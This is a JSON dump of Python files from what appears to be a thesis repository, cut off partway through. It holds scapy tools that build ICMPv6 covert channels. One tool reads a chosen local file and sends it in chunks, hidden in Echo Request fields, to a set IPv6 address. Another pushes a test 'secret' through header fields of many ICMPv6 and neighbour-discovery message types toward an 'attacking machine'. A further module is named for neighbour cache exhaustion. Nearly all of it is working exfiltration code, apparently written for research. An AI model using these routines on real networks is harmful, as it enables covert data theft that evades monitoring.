[ { "alpha_fraction": 0.4806051254272461, "alphanum_fraction": 0.48525989055633545, "avg_line_length": 34.80555725097656, "blob_id": "ac5a1a818a21fbbc8783f1e722f909fa17cc4b40", "content_id": "d2c089ff6a552ea02b238c3b4fee0d3da96029d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5156, "license_type": "no_license", "max_line_length": 100, "num_lines": 144, "path": "/python/code/covertChannels.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom receiver import *\n\n\n\"\"\"\nclass for Echo Request Covert Channels\n\"\"\"\nclass EchoRequest:\n\n def __init__(self):\n self.field = ''\n self.fieldContent = ''\n self.fields =['code', 'identifier', 'seqNum', 'data']\n self.name = 'EchoReqCovert'\n self.ipAddress = 'fe80::ad4:cff:fe13:7667'\n self.fileToSend = ''\n self.fileName = ''\n self.sendingBuffer = []\n self.maxPacketSize = 100\n\n #starts the interactive propmt\n def startSystem(self):\n Commands.setEchoRequestCovertHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match(\"help\", command):\n self.showHelp()\n #quit module command\n elif re.match(\"quit\", command):\n running = 0\n Commands.setCovertChannelHistory()\n elif re.match('setAdr', command):\n self.ipAddress = re.sub('setAdr', ' ', command).lstrip()\n print 'setting Ip address: ' + self.ipAddress\n elif re.match('iface', command):\n self.interface = re.sub('iface', ' ', command).lstrip()\n print 'setting interface: ' + self.interface\n elif re.match('code', command):\n self.field = 'code'\n self.fieldContent = re.sub('code', ' ', command).lstrip()\n print self.fieldContent\n elif re.match('data', command):\n self.field = 'data'\n self.fieldContent = re.sub('data', ' ', command).lstrip()\n print self.fieldContent \n elif re.match('rec', command):\n self.receiver()\n elif re.match('exec', command):\n self.execModule()\n elif re.match('show', command):\n self.buildPacket()\n #self.showAttributes()\n elif re.match(\"shell\", command):\n shell = 1\n Commands.setShellHistory()\n while shell:\n c = raw_input('$')\n if re.match(\"help\", c):\n self.showShellHelp()\n elif re.match(\"quit\", c):\n shell = 0\n Commands.setMainHistory()\n elif re.match(r'ls$', c):\n files = os.listdir('.')\n for f in files:\n print f\n elif re.match(r'ls -l', c):\n files = os.system(c)\n print files\n elif re.match('cd', c):\n path = re.sub('cd', ' ', c)\n try:\n os.chdir(path.strip())\n except:\n print 'Error! Wrong path!'\n elif re.match('select', c):\n path = re.sub('select', ' ', c)\n data = open(path.strip(), 'rb')\n self.fileToSend = data.read()\n data.close()\n self.fileName = path.strip()\n else:\n print 'Error! Command not found!'\n else:\n print 'Error! Command not found!'\n\n def showHelp(self):\n for entry in Help.getEchoRequestHelp():\n print entry\n\n def showShellHelp(self):\n for entry in Help.getShellHelp():\n print entry\n\n def showAttributes(self):\n attributes = [self.field]\n for entry in attributes:\n if entry:\n print entry\n else:\n print 'None'\n\n def buildPacket(self, chunk):\n if re.match('data', self.field):\n self.packet = IPv6(dst=self.ipAddress)/ICMPv6EchoRequest(data=chunk)\n if re.match('code', self.field):\n self.packet = IPv6(dst=self.ipAddress)/ICMPv6EchoRequest(code=chunk)\n #print self.packet.show()\n \n def execModule(self):\n self.chunkPackets(self.fileToSend)\n for chunk in self.sendingBuffer:\n self.buildPacket(chunk)\n send(self.packet, iface='wlan0')\n self.sendingBuffer = []\n\n def receiver(self):\n rec = Receiver()\n rec.receive()\n\n def chunkPackets(self, data):\n print '[*] size of file %d' % len(data)\n if len(data) <= self.maxPacketSize:\n self.sendingBuffer.append(data)\n else:\n chunksNumber = int(len(data)/self.maxPacketSize)\n chunks = [data[i:i+self.maxPacketSize] for i in range(0, len(data), self.maxPacketSize)]\n chunkNumber = 0\n for entry in chunks:\n self.sendingBuffer.append(entry)\n chunkNumber += 1\n print '[*] chunks %d' % chunkNumber\n" }, { "alpha_fraction": 0.6107091307640076, "alphanum_fraction": 0.6758321523666382, "avg_line_length": 26.639999389648438, "blob_id": "415ddc727dd0dd6b1bfcced0c8c7e21fea56ac95", "content_id": "6911872712dd3d3fc33b1fbcce360f763017636b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 691, "license_type": "no_license", "max_line_length": 74, "num_lines": 25, "path": "/python/code/echoRequest.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\n\"\"\"\nthe class build Echo Request messages\n\"\"\"\nclass EchoRequest:\n \n def __init__(self):\n print 'Echo Request'\n self.localAdr = \"2001:abcd:acad:1::2\"\n win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n\n def buildPacketEchoRequest(self, ipAdr):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n return IPv6(dst=ipAdr)/ICMPv6EchoRequest(id=0,seq=0)/data\n \n\n def execModuleEchoRequestNeighCacheExhaustion(self, exitIface, ipAdr):\n packetContainer = self.buildPacketEchoRequest(ipAdr)\n for x in range(1,10):\n send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.6064353585243225, "alphanum_fraction": 0.6135282516479492, "avg_line_length": 46.69033432006836, "blob_id": "10fffb0ea5088ef01cba8bcc9fec942674fe6bd2", "content_id": "fdee144345d411889d456d3fc588b71488f974a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48358, "license_type": "no_license", "max_line_length": 281, "num_lines": 1014, "path": "/python/code/allCovertTest.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom receiver import *\nfrom bitstring import *\n\n\"\"\"\nThis class is for testing all covert channels in one\n\"\"\"\nclass AllCovertTests:\n\n def __init__(self, iface):\n self.dataToExfilt = ': this is the super secret data to exfiltrate to our attacking machine\\n' \n self.ipAddress = ''\n self.iface = iface\n self.name = 'AllCovertTests'\n self.fragmentation = False\n\n def startSystem(self):\n Commands.setAllCovertTestHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setCovertChannelHistory()\n elif re.match('setAdr', command):\n self.ipAddress = re.sub('setAdr', ' ', command).lstrip()\n print 'setting Ip address: ' + self.ipAddress\n #toggle fragmentation\n elif re.match('frag', command):\n self.fragmentation = not self.fragmentation\n if self.fragmentation:\n print 'fragmentation is active'\n else:\n print 'fragmentation disabled'\n #execution of all tests\n elif re.match('exec', command):\n dest = DestinationUnreachableCovert(self.fragmentation)\n dest.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n dest.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n dest.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n #dest.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n big = PacketTooBigCovert(self.fragmentation)\n big.execModule(self.dataToExfilt, '', self.iface, self.ipAddress)\n big.execModule('', self.dataToExfilt, self.iface, self.ipAddress)\n time = TimeExceededCovert(self.fragmentation)\n time.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n time.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n time.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n #time.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n param = ParameterProblemCovert(self.fragmentation)\n param.execModule(self.dataToExfilt, '', self.iface, self.ipAddress)\n param.execModule('', self.dataToExfilt, self.iface, self.ipAddress)\n echoReq = EchoRequestCovert(self.fragmentation)\n echoReq.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n echoReq.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n echoReq.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n echoReq.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n echoRep = EchoReplyCovert(self.fragmentation)\n echoRep.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n echoRep.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n echoRep.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n echoRep.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n routerSol = RouterSolicitationCovert(self.fragmentation)\n routerSol.execModule(self.dataToExfilt, '', self.iface, self.ipAddress)\n routerSol.execModule('', self.dataToExfilt, self.iface, self.ipAddress)\n routerAdv = RouterAdvertisementCovert(self.fragmentation)\n routerAdv.execModule(self.dataToExfilt, '', '', '', '', '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', self.dataToExfilt, '', '', '', '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', self.dataToExfilt, '', '', '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', self.dataToExfilt, '', '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', self.dataToExfilt, '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', self.dataToExfilt, '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', self.dataToExfilt, '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', '', self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', '', '', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', '', '', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', '', '', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n neighbSol = NeighborSolicitationCovert(self.fragmentation)\n neighbSol.execModule(self.dataToExfilt, '', '', self.iface, self.ipAddress)\n neighbSol.execModule('', self.dataToExfilt, '', self.iface, self.ipAddress)\n neighbSol.execModule('', '', self.dataToExfilt, self.iface, self.ipAddress) \n neighbAdv = NeighborAdvertisementCovert(self.fragmentation)\n neighbAdv.execModule(self.dataToExfilt, '', '', '', '', '', self.iface, self.ipAddress)\n neighbAdv.execModule('', self.dataToExfilt, '', '', '', '', self.iface, self.ipAddress)\n neighbAdv.execModule('', '', self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n neighbAdv.execModule('', '', '', self.dataToExfilt, '', '', self.iface, self.ipAddress) \n neighbAdv.execModule('', '', '', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n neighbAdv.execModule('', '', '', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n redirect = RedirectCovert(self.fragmentation)\n redirect.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n redirect.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n redirect.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n redirect.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n \n elif re.match('rec', command):\n HelperClass.receiver(self.iface, self.ipAddress)\n\n def showHelp(self):\n for entry in Help.getAllCovertTestHelp():\n print entry\n\nclass DestinationUnreachableCovert:\n \n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthLength = 1\n self.bandwidthUnused = 3\n self.bandwidthPayload = 8\n self.nameCode = 'Destination Unreachable code '\n self.nameLength = 'Destination Unreachable length '\n self.nameUnused = 'Destination Unreachable unused '\n self.namePayload = 'Destination Unreachable payload '\n \n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6DestUnreach(code=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6DestUnreach(code=chunk)/'xxxxxxxx']\n\n def buildPacketLength(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6DestUnreach(length=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6DestUnreach(length=chunk)/\"xxxxxxxx\"]\n\n def buildPacketUnused(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6DestUnreach(unused=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6DestUnreach(unused=chunk)/\"xxxxxxxx\"]\n\n def buildPacketPayload(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6DestUnreach()/str(chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6DestUnreach()/str(chunk)]\n \n def execModule(self, dataCode, dataLength, dataUnused, dataPayload, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataLength:\n data = self.nameLength+dataLength\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthLength, self.nameLength)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketLength(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataUnused:\n data = self.nameUnused+dataUnused\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthUnused, self.nameUnused)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketUnused(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataPayload:\n data = self.namePayload+dataPayload\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthPayload, self.namePayload)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketPayload(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n\n \nclass PacketTooBigCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthMtu = 4\n self.nameCode = 'Packet Too Big code '\n self.nameMtu = 'Packet Too Big MTU '\n \n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6PacketTooBig(code=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6PacketTooBig(code=chunk)/\"xxxxxxxx\"]\n\n def buildPacketMtu(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6PacketTooBig(mtu=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6PacketTooBig(mtu=chunk)/\"xxxxxxxx\"]\n \n def execModule(self, dataCode, dataMtu, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataMtu:\n data = self.nameMtu+dataMtu\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthMtu, self.nameMtu)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketMtu(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False) \n\nclass TimeExceededCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthLength = 1\n self.bandwidthUnused = 3\n self.bandwidthPayload = 8\n self.nameCode = 'Time Exceeded code '\n self.nameLength = 'Time Exceeded length '\n self.nameUnused = 'Time Exceeded unused '\n self.namePayload = 'Time Exceeded payload '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6TimeExceeded(code=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6TimeExceeded(code=chunk)/\"xxxxxxxx\"]\n\n def buildPacketLength(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6TimeExceeded(length=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6TimeExceeded(length=chunk)/\"xxxxxxxx\"]\n\n def buildPacketUnused(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6TimeExceeded(unused=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6TimeExceeded(unused=chunk)/\"xxxxxxxx\"]\n\n def buildPacketPayload(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6TimeExceeded()/str(chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6TimeExceeded()/str(chunk)]\n \n def execModule(self, dataCode, dataLength, dataUnused, dataPayload, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataLength:\n data = self.nameLength+dataLength\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthLength, self.nameLength)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketLength(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataUnused:\n data = self.nameUnused+dataUnused\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthUnused, self.nameUnused)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketUnused(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataPayload:\n data = self.namePayload+dataPayload\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthPayload, self.namePayload)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketPayload(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \nclass ParameterProblemCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthPointer = 4\n self.nameCode = 'Parameter Problem code '\n self.namePointer = 'Parameter Problem pointer '\n \n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ParamProblem(code=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ParamProblem(code=chunk)/\"xxxxxxxx\"]\n\n def buildPacketPointer(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ParamProblem(ptr=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ParamProblem(ptr=chunk)/\"xxxxxxxx\"]\n\n def execModule(self, dataCode, dataPointer, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataPointer:\n data = self.namePointer+dataPointer\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthPointer, self.namePointer)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketPointer(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass EchoRequestCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthId = 2\n self.bandwidthSeq = 2\n self.bandwidthData = 8\n self.nameCode = 'Echo Request code '\n self.nameId = 'Echo Request identifier '\n self.nameSeq = 'Echo Request sequence number '\n self.nameData = 'Echo Request data '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoRequest(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoRequest(code=chunk)]\n\n def buildPacketId(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoRequest(id=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoRequest(id=chunk)]\n\n def buildPacketSeq(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoRequest(seq=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoRequest(seq=chunk)]\n\n def buildPacketData(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoRequest(data=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoRequest(data=chunk)]\n\n def execModule(self, dataCode, dataId, dataSeq, dataData, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataId:\n data = self.nameId+dataId\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthId, self.nameId)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketId(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataSeq:\n data = self.nameSeq+dataSeq\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthSeq, self.nameSeq)\n for chunk in sendingBuffer:\n packetContainer= self.buildPacketSeq(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataData:\n data = self.nameData+dataData\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthData, self.nameData)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketData(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass EchoReplyCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthId = 2\n self.bandwidthSeq = 2\n self.bandwidthData = 8\n self.nameCode = 'Echo Reply code '\n self.nameId = 'Echo Reply identifier '\n self.nameSeq = 'Echo Reply sequence number '\n self.nameData = 'Echo Reply data '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoReply(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoReply(code=chunk)]\n\n def buildPacketId(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoReply(id=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoReply(id=chunk)]\n\n def buildPacketSeq(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoReply(seq=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoReply(seq=chunk)]\n\n def buildPacketData(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoReply(data=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoReply(data=chunk)]\n\n def execModule(self, dataCode, dataId, dataSeq, dataData, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataId:\n data = self.nameId+dataId\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthId, self.nameId)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketId(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataSeq:\n data = self.nameSeq+dataSeq\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthSeq, self.nameSeq)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketSeq(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataData:\n data = self.nameData+dataData\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthData, self.nameData)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketData(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass RouterSolicitationCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthRes = 4\n self.nameCode = 'Router Solicitation code '\n self.nameRes = 'Router Solicitation reserved '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RS(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RS(code=chunk)]\n\n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RS(res=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RS(res=chunk)]\n \n def execModule(self, dataCode, dataRes, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = self.nameRes+dataRes\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRes, self.nameRes)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRes(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass RouterAdvertisementCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthCurHopLimit = 1\n self.bandwidthM = 1\n self.bandwidthO = 1\n self.bandwidthH = 1\n self.bandwidthPrf = 1\n self.bandwidthP = 1\n self.bandwidthRes = 1\n self.bandwidthRouterLifeTime = 2\n self.bandwidthReachTime = 4\n self.bandwidthRetransTimer = 4\n self.nameCode = 'Router Advertisement code '\n self.nameCurHopLimit = 'Router Advertisement Cur Hop Limit '\n self.nameM = 'Router Advertisement M '\n self.nameO = 'Router Advertisement O '\n self.nameH = 'Router Advertisement H '\n self.namePrf = 'Router Advertisement Prf '\n self.nameP = 'Router Advertisement P '\n self.nameRes = 'Router Advertisement reserved '\n self.nameRouterLifeTime = 'Router Advertisement router life time '\n self.nameReachTime = 'Router Advertisement reachable time '\n self.nameRetransTimer = 'Router Advertisement retrans timer '\n\n #set routerlifetime for all, default is 1800 and the receiver is not happy\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=chunk, routerlifetime=0)]\n\n def buildPacketCurHopLimit(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(chlim=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(chlim=chunk, routerlifetime=0)]\n\n def buildPacketM(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=1, M=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=1, M=chunk, routerlifetime=0)]\n\n def buildPacketO(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=2, O=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=2, O=chunk, routerlifetime=0)]\n\n def buildPacketH(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=3, H=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=3, H=chunk, routerlifetime=0)]\n\n def buildPacketPrf(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=4, prf=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=4, prf=chunk, routerlifetime=0)]\n\n def buildPacketP(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=5, P=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=5, P=chunk, routerlifetime=0)]\n \n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=6, res=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=6, res=chunk, routerlifetime=0)]\n\n def buildPacketRouterLifeTime(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(routerlifetime=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(routerlifetime=chunk)]\n\n def buildPacketReachTime(self, chunk, ipAdr):\n if self.fragmentation:\n return 